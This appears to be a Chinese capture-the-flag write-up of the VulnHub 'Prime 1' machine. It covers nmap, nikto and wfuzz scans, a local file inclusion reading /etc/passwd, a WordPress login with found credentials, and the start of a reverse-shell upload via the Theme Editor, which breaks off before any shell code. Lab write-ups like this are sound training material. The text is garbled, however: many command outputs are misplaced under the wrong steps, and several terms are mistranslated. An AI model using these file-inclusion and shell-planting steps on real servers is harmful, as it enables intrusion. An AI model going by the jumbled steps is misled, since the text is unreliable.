打靶记载 Prime1

https://www.vulnhub.com/entry/prime-1,358/

主机发现端口扫描

• 探测存活主机，137是靶机
  1. nmap -sP 192.168.75.0/24
  2. //                       
  3. Starting Nmap 7.93 ( https://nmap.org ) at 2024-09-22 16:25 CST
  4. Nmap scan report for 192.168.75.1
  5. Host is up (0.00028s latency).
  6. MAC Address: 00:50:56:C0:00:08 (VMware)
  7. Nmap scan report for 192.168.75.2
  8. Host is up (0.00026s latency).
  9. MAC Address: 00:50:56:FB:CA:45 (VMware)
  10. Nmap scan report for 192.168.75.137
  11. Host is up (0.0010s latency).
  12. MAC Address: 00:0C:29:69:EE:71 (VMware)
  13. Nmap scan report for 192.168.75.254
  14. Host is up (0.00018s latency).
  15. MAC Address: 00:50:56:F8:B3:1A (VMware)
  16. Nmap scan report for 192.168.75.131
  17. Host is up.

  复制代码
• 扫描靶机所有开放端口
  1. nmap -sT -min-rate 10000 -p- 192.168.75.137        
  2. //                  
  3. Starting Nmap 7.93 ( https://nmap.org ) at 2024-09-22 17:54 CST
  4. Nmap scan report for 192.168.75.137
  5. Host is up (0.0014s latency).
  6. Not shown: 65533 closed tcp ports (conn-refused)
  7. PORT   STATE SERVICE
  8. 22/tcp open  ssh
  9. 80/tcp open  http
  10. MAC Address: 00:0C:29:69:EE:71 (VMware)

  复制代码
• 扫描服务版本及系统版本
  1. nmap -sT -sV -O -p22,80 192.168.75.137           
  2. //                     
  3. Starting Nmap 7.93 ( https://nmap.org ) at 2024-09-22 17:57 CST
  4. Nmap scan report for 192.168.75.137
  5. Host is up (0.00045s latency).
  7. PORT   STATE SERVICE VERSION
  8. 22/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0)
  9. 80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
  10. MAC Address: 00:0C:29:69:EE:71 (VMware)
  11. Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
  12. Device type: general purpose
  13. Running: Linux 3.X|4.X
  14. OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
  15. OS details: Linux 3.2 - 4.9
  16. Network Distance: 1 hop
  17. Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

  复制代码
• udp扫描
  1. nmap -sU 192.168.75.137  
  2. //                       
  3. Starting Nmap 7.93 ( https://nmap.org ) at 2024-09-22 17:57 CST
  4. Nmap scan report for 192.168.75.137
  5. Host is up (0.00073s latency).
  6. Not shown: 997 closed udp ports (port-unreach)
  7. PORT     STATE         SERVICE
  8. 68/udp   open|filtered dhcpc
  9. 631/udp  open|filtered ipp
  10. 5353/udp open|filtered zeroconf
  11. MAC Address: 00:0C:29:69:EE:71 (VMware)

  复制代码
• 扫描漏洞
  1. nmap -script=vuln -p 22,80, 192.168.75.137      
  2. //
  3. PORT   STATE SERVICE
  4. 22/tcp open  ssh
  5. 80/tcp open  http
  6. |_http-vuln-cve2017-1001000: ERROR: Script execution failed (use -d to debug)
  7. | http-slowloris-check:
  8. |   VULNERABLE:
  9. |   Slowloris DOS attack
  10. |     State: LIKELY VULNERABLE
  11. |     IDs:  CVE:CVE-2007-6750
  12. |       Slowloris tries to keep many connections to the target web server open and hold
  13. |       them open as long as possible.  It accomplishes this by opening connections to
  14. |       the target web server and sending a partial request. By doing so, it starves
  15. |       the http server's resources causing Denial Of Service.
  16. |      
  17. |     Disclosure date: 2009-09-17
  18. |     References:
  19. |       http://ha.ckers.org/slowloris/
  20. |_      https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6750
  21. |_http-csrf: Couldn't find any CSRF vulnerabilities.
  22. |_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
  23. | http-enum:
  24. |   /wordpress/: Blog
  25. |_  /wordpress/wp-login.php: Wordpress login page.
  26. |_http-dombased-xss: Couldn't find any DOM based XSS.
  27. MAC Address: 00:0C:29:69:EE:71 (VMware)

  复制代码
  扫描出 slowloris DOS用不上，以及cve2017-1001000 ，并且扫出存在wordpress 版本是  http://192.168.75.137/javascript/[18:49:32] 403 -  279B  - /server-status/[18:49:32] 403 -  279B  - /server-status[18:49:36] 200 -    1KB - /wordpress/wp-login.php[18:49:36] 200 -    4KB - /wordpress/[/code]查看/dev ，由于它不是一个正常该有的目录
  1. nikto -host 192.168.75.137 -port 22,80
  2. //
  3. - Nikto v2.5.0
  4. ---------------------------------------------------------------------------
  5. ---------------------------------------------------------------------------
  6. + Target IP:          192.168.75.137
  7. + Target Hostname:    192.168.75.137
  8. + Target Port:        80
  9. + Start Time:         2024-09-22 18:44:45 (GMT8)
  10. ---------------------------------------------------------------------------
  11. + Server: Apache/2.4.18 (Ubuntu)
  12. + /: The anti-clickjacking X-Frame-Options header is not present. See: https://developer.mozill.org/en-US/docs/Web/HTTP/Headers/X-Frame-Options
  13. + /: The X-Content-Type-Options header is not set. This could allow the user agent to render th content of the site in a different fashion to the MIME type. See: https://www.netsparker.com/wb-vulnerability-scanner/vulnerabilities/missing-content-type-header/
  14. + No CGI Directories found (use '-C all' to force check all possible dirs)
  15. + Apache/2.4.18 appears to be outdated (current is at least Apache/2.4.54). Apache 2.2.34 is th EOL for the 2.x branch.
  16. + /: Web Server returns a valid response with junk HTTP methods which may cause false positives
  17. + /icons/README: Apache default file found. See: https://www.vntweb.co.uk/apache-restricting-access-to-iconsreadme/                                                                           
  18. + /wordpress/wp-content/plugins/akismet/readme.txt: The WordPress Akismet plugin 'Tested up to' version usually matches the WordPress version.                                                
  19. + /wordpress/wp-links-opml.php: This WordPress script reveals the installed version.           
  20. + /wordpress/wp-admin/: Uncommon header 'x-redirect-by' found, with contents: WordPress.      
  21. + /wordpress/: Drupal Link header found with value: <http://192.168.75.137/wordpress/index.php?rest_route=/>; rel="https://api.w.org/". See: https://www.drupal.org/                          
  22. + /wordpress/: A Wordpress installation was found.
  23. + /wordpress/wp-login.php?action=register: Cookie wordpress_test_cookie created without the httponly flag. See: https://developer.mozilla.org/en-US/docs/Web/HTTP/Cookies
  24. + /wordpress/wp-content/uploads/: Directory indexing found.
  25. + /wordpress/wp-content/uploads/: Wordpress uploads directory is browsable. This may reveal sensitive information.
  26. + /wordpress/wp-login.php: Wordpress login found.
  27. + 8106 requests: 0 error(s) and 14 item(s) reported on remote host
  28. + End Time:           2024-09-22 18:45:09 (GMT8) (24 seconds)
  29. ---------------------------------------------------------------------------
  30. + 1 host(s) tested

  复制代码
  意思是让我们更努力的去爆破目录？
  
• python .\dirsearch.py -u http://192.168.75.137/ --suffixes .txt,.zip 给字典加上.txt,.zip 后缀去爆破
  1. [18:49:23] 200 -  131B  - /dev
  2. [18:49:25] 200 -  137B  - /image.php
  3. [18:49:26] 301 -  321B  - /javascript  ->  http://192.168.75.137/javascript/
  4. [18:49:32] 403 -  279B  - /server-status/
  5. [18:49:32] 403 -  279B  - /server-status
  6. [18:49:36] 200 -    1KB - /wordpress/wp-login.php
  7. [18:49:36] 200 -    4KB - /wordpress/

  复制代码
  查看内容得出
  1. hello,
  3. now you are at level 0 stage.
  5. In real life pentesting we should use our tools to dig on a web very hard.
  7. Happy hacking.

  复制代码
  让我们进行fuzz爆破，大概意思是让我们在所有php文件进行fuzz ，大概就是让我们fuzz出get参数
  
• 扫描出所有php文件
  1. http://192.168.75.137/secret.txt

  复制代码
  当前目录下只有两个php文件我们两个都试试
  
• 对index.php进行fuzz
  注意 --hh 136 需要对视情况进行调整，过滤掉其他结果后，最后得出file这个参数
  1. Looks like you have got some secrets.
  3. Ok I just want to do some help to you.
  5. Do some more fuzz on every page of php which was finded by you. And if
  6. you get any right parameter then follow the below steps. If you still stuck
  7. Learn from here a basic tool with good usage for OSCP.
  9. https://github.com/hacknpentest/Fuzzing/blob/master/Fuzz_For_Web
  11. //see the location.txt and you will get your next move//

  复制代码
• 访问http://192.168.75.137/index.php?file=
  1. irb http://192.168.75.137 -X .php               
  3. -----------------
  4. DIRB v2.22   
  5. By The Dark Raver
  6. -----------------
  8. START_TIME: Sun Sep 22 20:12:05 2024
  9. URL_BASE: http://192.168.75.137/
  10. WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt
  11. EXTENSIONS_LIST: (.php) | (.php) [NUM = 1]
  13. -----------------
  15. GENERATED WORDS: 4612                                                         
  17. ---- Scanning URL: http://192.168.75.137/ ----
  18. + http://192.168.75.137/image.php (CODE:200|SIZE:147)                                                                                      
  19. + http://192.168.75.137/index.php (CODE:200|SIZE:136)                                                                                      
  20.                                                                                                                                           
  21. -----------------
  22. END_TIME: Sun Sep 22 20:12:08 2024
  23. DOWNLOADED: 4612 - FOUND: 2

  复制代码
  大概file的参数也需要我们进行fuzz，实在这事burp也可以做
  但是之前的secret.txt还有一句 : //see the location.txt and you will get your next move//
  以是我们访问 ：http://192.168.75.137/index.php?file=location.txt
  果然存在有信息
  1. wfuzz -c -w /usr/share/wfuzz/wordlist/general/common.txt --hh 136 http://192.168.75.137/index.php?FUZZ=something
  2. //hh 过滤掉了 字长为136的数据
  3. ********************************************************
  4. * Wfuzz 3.1.0 - The Web Fuzzer                         *
  5. ********************************************************
  7. Target: http://192.168.75.137/index.php?FUZZ=something
  8. Total requests: 951
  10. =====================================================================
  11. ID           Response   Lines    Word       Chars       Payload                       
  12. =====================================================================
  14. 000000341:   200        7 L      19 W       206 Ch      "file"                        
  16. Total time: 1.060608
  17. Processed Requests: 951
  18. Filtered Requests: 950
  19. Requests/sec.: 896.6547

  复制代码
  让我们使用secrettier360 参数去别的php页面fuzz ，大概是
  别的php页面除了index.php那就是image.php
  
• 对image.php 进行fuzz
  1. 提示：Do something better you are digging wrong file

  复制代码
  得出参数dev ，实验访问：http://192.168.75.137/image.php?secrettier360=dev
  1. Now dig some more for next one
  2. use 'secrettier360' parameter on some other php page for more fun.

  复制代码
  WTF？这不是之前的/dev吗，但是发现你只要在secrettier360 加上文件名，那不就是文件包罗了吗?我这里大发奇想使用php伪协议实验，但是发现使用不了，应该是禁用了
  
• 利用文件包罗漏洞
  实验读取/etc/passwd
  1. wfuzz -c -w /usr/share/wfuzz/wordlist/general/common.txt --hh 197 http://192.168.75.137/image.php?secrettier360=FUZZ
  2. ********************************************************
  3. * Wfuzz 3.1.0 - The Web Fuzzer                         *
  4. ********************************************************
  6. Target: http://192.168.75.137/image.php?secrettier360=FUZZ
  7. Total requests: 951
  9. =====================================================================
  10. ID           Response   Lines    Word       Chars       Payload                       
  11. =====================================================================
  13. 000000257:   200        13 L     43 W       328 Ch      "dev"                        
  15. Total time: 1.031432
  16. Processed Requests: 951
  17. Filtered Requests: 950
  18. Requests/sec.: 922.0189

  复制代码
  发现saket:x:1001:1001:find password.txt file in my directory:/home/saket: ，好好好
  1. finaly you got the right parameter
  3. hello, now you are at level 0 stage. In real life pentesting we should use our tools to dig on a web very hard. Happy hacking.

  复制代码
  密码应该是follow_the_ippsec
  
• 登录wordpress背景，用户名victor，密码follow_the_ippsec
  为什么用户名是victor ，由于wordpress/index.php里面第一条信息就是victor 发布的，以是猜测用户名是victor ，成功进入背景
  

背景利用获得低级shell

<ol>进入背景，plugins → Add New → upload plugins ,上传反弹shell文件

发现没有上传权限，纵然设置关闭了以月份创建文件夹
探求别的地方上传shellcode
在Appearance→Theme Editor →secret.php 找到了可编辑保存的文件
我们将shellcode输进去
[code]